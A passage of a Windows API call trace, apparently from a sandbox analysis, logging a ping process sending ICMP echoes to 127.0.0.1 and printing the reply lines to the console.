returned 32768 [0104.601] LocalFree (hMem=0xb3c4a8) returned 0x0 [0104.601] LocalFree (hMem=0xb47ac8) returned 0x0 [0104.601] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0104.601] IcmpSendEcho2Ex (in: IcmpHandle=0xb369c0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xb3c200, RequestSize=0x20, RequestOptions=0x5af0ac, ReplyBuffer=0xb45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xb45270) returned 0x1 [0104.602] InetNtopW (in: Family=2, pAddr=0x5af09c, pStringBuf=0x5af1c4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0104.602] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x5af030, nSize=0x0, Arguments=0x5af02c | out: lpBuffer="笈´宅Z⛔\x94䰨盪✣") returned 0x16 [0104.602] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.602] _fileno (_File=0x76ea4c28) returned 1 [0104.602] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.602] GetFileType (hFile=0x28) returned 0x2 [0104.602] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff4 | out: lpMode=0x5aeff4) returned 0 [0104.602] GetLastError () returned 0x6 [0104.602] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef58, nSize=0x50 | out: lpBuffer="Z✣") returned 0x0 [0104.602] _fileno (_File=0x76ea4c28) returned 1 [0104.602] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0104.602] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0104.602] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xb47b40 [0104.602] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xb47b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0104.602] _fileno (_File=0x76ea4c28) returned 1 [0104.602] _write (in: _FileHandle=1, _Buf=0xb47b40*, _MaxCharCount=0x16 | out: _Buf=0xb47b40*) returned 22 [0104.603] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.603] _fileno (_File=0x76ea4c28) returned 1 [0104.603] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0104.603] LocalFree (hMem=0xb47b40) returned 0x0 [0104.603] LocalFree (hMem=0xb47b08) returned 0x0 [0104.603] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x5af030, nSize=0x0, Arguments=0x5af02c | out: lpBuffer="笈´宅Z⛿\x94䰨盪✼") returned 0x9 [0104.603] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.603] _fileno (_File=0x76ea4c28) returned 1 [0104.603] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.603] GetFileType (hFile=0x28) returned 0x2 [0104.603] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff4 | out: lpMode=0x5aeff4) returned 0 [0104.603] GetLastError () returned 0x6 [0104.603] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef58, nSize=0x50 | out: lpBuffer="Z✼") returned 0x0 [0104.603] _fileno (_File=0x76ea4c28) returned 1 [0104.603] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0104.603] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0104.603] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb38a78 [0104.603] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xb38a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0104.603] _fileno (_File=0x76ea4c28) returned 1 [0104.603] _write (in: _FileHandle=1, _Buf=0xb38a78*, _MaxCharCount=0x9 | out: _Buf=0xb38a78*) returned 9 [0104.603] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.603] _fileno (_File=0x76ea4c28) returned 1 [0104.603] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0104.603] LocalFree (hMem=0xb38a78) returned 0x0 [0104.603] LocalFree (hMem=0xb47b08) returned 0x0 [0104.603] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x5af034, nSize=0x0, Arguments=0x5af030 | out: lpBuffer="笈´宅Z➷\x94䰨盪✧") returned 0x9 [0104.603] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.603] _fileno (_File=0x76ea4c28) returned 1 [0104.603] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.603] GetFileType (hFile=0x28) returned 0x2 [0104.603] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff8 | out: lpMode=0x5aeff8) returned 0 [0104.603] GetLastError () returned 0x6 [0104.603] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef5c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0104.603] _fileno (_File=0x76ea4c28) returned 1 [0104.603] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0104.603] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0104.603] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb38928 [0104.603] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xb38928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0104.603] _fileno (_File=0x76ea4c28) returned 1 [0104.603] _write (in: _FileHandle=1, _Buf=0xb38928*, _MaxCharCount=0x9 | out: _Buf=0xb38928*) returned 9 [0104.603] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.603] _fileno (_File=0x76ea4c28) returned 1 [0104.603] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0104.603] LocalFree (hMem=0xb38928) returned 0x0 [0104.603] LocalFree (hMem=0xb47b08) returned 0x0 [0104.603] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x5af030, nSize=0x0, Arguments=0x5af02c | out: lpBuffer="笈´宅Z⟘\x94䰨盪✨") returned 0x9 [0104.603] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.603] _fileno (_File=0x76ea4c28) returned 1 [0104.603] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.603] GetFileType (hFile=0x28) returned 0x2 [0104.603] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff4 | out: lpMode=0x5aeff4) returned 0 [0104.604] GetLastError () returned 0x6 [0104.604] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef58, nSize=0x50 | out: lpBuffer="Z✨") returned 0x0 [0104.604] _fileno (_File=0x76ea4c28) returned 1 [0104.604] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0104.604] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0104.604] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb38a48 [0104.604] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xb38a48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0104.604] _fileno (_File=0x76ea4c28) returned 1 [0104.604] _write (in: _FileHandle=1, _Buf=0xb38a48*, _MaxCharCount=0x9 | out: _Buf=0xb38a48*) returned 9 [0104.604] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0104.604] _fileno (_File=0x76ea4c28) returned 1 [0104.604] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0104.604] LocalFree (hMem=0xb38a48) returned 0x0 [0104.604] LocalFree (hMem=0xb47b08) returned 0x0 [0104.604] Sleep (dwMilliseconds=0x3e8) [0105.615] IcmpSendEcho2Ex (in: IcmpHandle=0xb369c0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xb3c200, RequestSize=0x20, RequestOptions=0x5af0ac, ReplyBuffer=0xb45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xb45270) returned 0x1 [0105.616] InetNtopW (in: Family=2, pAddr=0x5af09c, pStringBuf=0x5af1c4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0105.616] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x5af030, nSize=0x0, Arguments=0x5af02c | out: lpBuffer="羠´宅Z⛔\x94䰨盪✣") returned 0x16 [0105.616] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0105.616] _fileno (_File=0x76ea4c28) returned 1 [0105.616] _get_osfhandle (_FileHandle=1) returned 0x28 [0105.616] GetFileType (hFile=0x28) returned 0x2 [0105.616] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff4 | out: lpMode=0x5aeff4) returned 0 [0105.616] GetLastError () returned 0x6 [0105.616] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef58, nSize=0x50 | out: lpBuffer="Z✣") returned 0x0 [0105.616] _fileno (_File=0x76ea4c28) returned 1 [0105.616] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0105.616] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0105.616] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xb47fd8 [0105.616] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xb47fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0105.616] _fileno (_File=0x76ea4c28) returned 1 [0105.616] _write (in: _FileHandle=1, _Buf=0xb47fd8*, _MaxCharCount=0x16 | out: _Buf=0xb47fd8*) returned 22 [0105.616] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0105.616] _fileno (_File=0x76ea4c28) returned 1 [0105.616] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0105.616] LocalFree (hMem=0xb47fd8) returned 0x0 [0105.616] LocalFree (hMem=0xb47fa0) returned 0x0 [0105.616] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x5af030, nSize=0x0, Arguments=0x5af02c | out: lpBuffer="羠´宅Z⛿\x94䰨盪✼") returned 0x9 [0105.616] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0105.616] _fileno (_File=0x76ea4c28) returned 1 [0105.617] _get_osfhandle (_FileHandle=1) returned 0x28 [0105.617] GetFileType (hFile=0x28) returned 0x2 [0105.617] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff4 | out: lpMode=0x5aeff4) returned 0 [0105.617] GetLastError () returned 0x6 [0105.617] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef58, nSize=0x50 | out: lpBuffer="Z✼") returned 0x0 [0105.617] _fileno (_File=0x76ea4c28) returned 1 [0105.617] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0105.617] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0105.617] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb38a30 [0105.617] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xb38a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0105.617] _fileno (_File=0x76ea4c28) returned 1 [0105.617] _write (in: _FileHandle=1, _Buf=0xb38a30*, _MaxCharCount=0x9 | out: _Buf=0xb38a30*) returned 9 [0105.617] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0105.617] _fileno (_File=0x76ea4c28) returned 1 [0105.617] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0105.617] LocalFree (hMem=0xb38a30) returned 0x0 [0105.617] LocalFree (hMem=0xb47fa0) returned 0x0 [0105.617] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x5af034, nSize=0x0, Arguments=0x5af030 | out: lpBuffer="羠´宅Z➷\x94䰨盪✧") returned 0x9 [0105.617] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0105.617] _fileno (_File=0x76ea4c28) returned 1 [0105.617] _get_osfhandle (_FileHandle=1) returned 0x28 [0105.617] GetFileType (hFile=0x28) returned 0x2 [0105.617] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff8 | out: lpMode=0x5aeff8) returned 0 [0105.617] GetLastError () returned 0x6 [0105.617] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef5c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0105.617] _fileno (_File=0x76ea4c28) returned 1 [0105.617] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0105.617] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0105.617] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb389b8 [0105.617] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xb389b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0105.617] _fileno (_File=0x76ea4c28) returned 1 [0105.617] _write (in: _FileHandle=1, _Buf=0xb389b8*, _MaxCharCount=0x9 | out: _Buf=0xb389b8*) returned 9 [0105.617] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0105.617] _fileno (_File=0x76ea4c28) returned 1 [0105.617] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0105.617] LocalFree (hMem=0xb389b8) returned 0x0 [0105.617] LocalFree (hMem=0xb47fa0) returned 0x0 [0105.617] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x5af030, nSize=0x0, Arguments=0x5af02c | out: lpBuffer="羠´宅Z⟘\x94䰨盪✨") returned 0x9 [0105.618] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0105.618] _fileno (_File=0x76ea4c28) returned 1 [0105.618] _get_osfhandle (_FileHandle=1) returned 0x28 [0105.618] GetFileType (hFile=0x28) returned 0x2 [0105.618] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff4 | out: lpMode=0x5aeff4) returned 0 [0105.618] GetLastError () returned 0x6 [0105.618] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef58, nSize=0x50 | out: lpBuffer="Z✨") returned 0x0 [0105.618] _fileno (_File=0x76ea4c28) returned 1 [0105.618] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0105.618] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0105.618] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb389b8 [0105.618] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xb389b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0105.618] _fileno (_File=0x76ea4c28) returned 1 [0105.618] _write (in: _FileHandle=1, _Buf=0xb389b8*, _MaxCharCount=0x9 | out: _Buf=0xb389b8*) returned 9 [0105.618] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0105.618] _fileno (_File=0x76ea4c28) returned 1 [0105.618] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0105.618] LocalFree (hMem=0xb389b8) returned 0x0 [0105.618] LocalFree (hMem=0xb47fa0) returned 0x0 [0105.618] Sleep (dwMilliseconds=0x3e8) [0106.630] IcmpSendEcho2Ex (in: IcmpHandle=0xb369c0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xb3c200, RequestSize=0x20, RequestOptions=0x5af0ac, ReplyBuffer=0xb45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xb45270) returned 0x1 [0106.631] InetNtopW (in: Family=2, pAddr=0x5af09c, pStringBuf=0x5af1c4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0106.631] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x5af030, nSize=0x0, Arguments=0x5af02c | out: lpBuffer="羠´宅Z⛔\x94䰨盪✣") returned 0x16 [0106.631] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0106.631] _fileno (_File=0x76ea4c28) returned 1 [0106.631] _get_osfhandle (_FileHandle=1) returned 0x28 [0106.631] GetFileType (hFile=0x28) returned 0x2 [0106.631] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff4 | out: lpMode=0x5aeff4) returned 0 [0106.631] GetLastError () returned 0x6 [0106.631] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef58, nSize=0x50 | out: lpBuffer="Z✣") returned 0x0 [0106.631] _fileno (_File=0x76ea4c28) returned 1 [0106.631] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0106.632] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0106.632] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xb47fd8 [0106.632] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xb47fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0106.632] _fileno (_File=0x76ea4c28) returned 1 [0106.632] _write (in: _FileHandle=1, _Buf=0xb47fd8*, _MaxCharCount=0x16 | out: _Buf=0xb47fd8*) returned 22 [0106.632] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0106.632] _fileno (_File=0x76ea4c28) returned 1 [0106.632] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0106.632] LocalFree (hMem=0xb47fd8) returned 0x0 [0106.632] LocalFree (hMem=0xb47fa0) returned 0x0 [0106.632] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x5af030, nSize=0x0, Arguments=0x5af02c | out: lpBuffer="羠´宅Z⛿\x94䰨盪✼") returned 0x9 [0106.632] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0106.632] _fileno (_File=0x76ea4c28) returned 1 [0106.632] _get_osfhandle (_FileHandle=1) returned 0x28 [0106.632] GetFileType (hFile=0x28) returned 0x2 [0106.632] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff4 | out: lpMode=0x5aeff4) returned 0 [0106.632] GetLastError () returned 0x6 [0106.632] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef58, nSize=0x50 | out: lpBuffer="Z✼") returned 0x0 [0106.632] _fileno (_File=0x76ea4c28) returned 1 [0106.632] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0106.632] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0106.632] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb38a30 [0106.632] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xb38a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0106.632] _fileno (_File=0x76ea4c28) returned 1 [0106.632] _write (in: _FileHandle=1, _Buf=0xb38a30*, _MaxCharCount=0x9 | out: _Buf=0xb38a30*) returned 9 [0106.632] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0106.632] _fileno (_File=0x76ea4c28) returned 1 [0106.632] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0106.632] LocalFree (hMem=0xb38a30) returned 0x0 [0106.632] LocalFree (hMem=0xb47fa0) returned 0x0 [0106.632] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x5af034, nSize=0x0, Arguments=0x5af030 | out: lpBuffer="羠´宅Z➷\x94䰨盪✧") returned 0x9 [0106.632] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0106.632] _fileno (_File=0x76ea4c28) returned 1 [0106.632] _get_osfhandle (_FileHandle=1) returned 0x28 [0106.632] GetFileType (hFile=0x28) returned 0x2 [0106.632] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff8 | out: lpMode=0x5aeff8) returned 0 [0106.632] GetLastError () returned 0x6 [0106.632] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef5c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0106.632] _fileno (_File=0x76ea4c28) returned 1 [0106.632] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0106.632] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0106.633] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb389b8 [0106.633] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xb389b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0106.633] _fileno (_File=0x76ea4c28) returned 1 [0106.633] _write (in: _FileHandle=1, _Buf=0xb389b8*, _MaxCharCount=0x9 | out: _Buf=0xb389b8*) returned 9 [0106.633] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0106.633] _fileno (_File=0x76ea4c28) returned 1 [0106.633] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0106.633] LocalFree (hMem=0xb389b8) returned 0x0 [0106.633] LocalFree (hMem=0xb47fa0) returned 0x0 [0106.633] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x5af030, nSize=0x0, Arguments=0x5af02c | out: lpBuffer="羠´宅Z⟘\x94䰨盪✨") returned 0x9 [0106.633] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0106.633] _fileno (_File=0x76ea4c28) returned 1 [0106.633] _get_osfhandle (_FileHandle=1) returned 0x28 [0106.633] GetFileType (hFile=0x28) returned 0x2 [0106.633] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aeff4 | out: lpMode=0x5aeff4) returned 0 [0106.633] GetLastError () returned 0x6 [0106.633] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aef58, nSize=0x50 | out: lpBuffer="Z✨") returned 0x0 [0106.633] _fileno (_File=0x76ea4c28) returned 1 [0106.633] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0106.633] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0106.633] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb38a78 [0106.633] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xb38a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0106.633] _fileno (_File=0x76ea4c28) returned 1 [0106.633] _write (in: _FileHandle=1, _Buf=0xb38a78*, _MaxCharCount=0x9 | out: _Buf=0xb38a78*) returned 9 [0106.633] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0106.633] _fileno (_File=0x76ea4c28) returned 1 [0106.633] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0106.633] LocalFree (hMem=0xb38a78) returned 0x0 [0106.633] LocalFree (hMem=0xb47fa0) returned 0x0 [0106.633] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x5aefb8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0106.633] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x5aef8c, nSize=0x0, Arguments=0x5aef88 | out: lpBuffer="羠´Z᧰\x94䰨盪❏") returned 0x5c [0106.633] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0106.633] _fileno (_File=0x76ea4c28) returned 1 [0106.633] _get_osfhandle (_FileHandle=1) returned 0x28 [0106.633] GetFileType (hFile=0x28) returned 0x2 [0106.633] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aef50 | out: lpMode=0x5aef50) returned 0 [0106.633] GetLastError () returned 0x6 [0106.633] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aeeb4, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0106.634] _fileno (_File=0x76ea4c28) returned 1 [0106.634] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0106.634] WideCharToMultiByte (in: 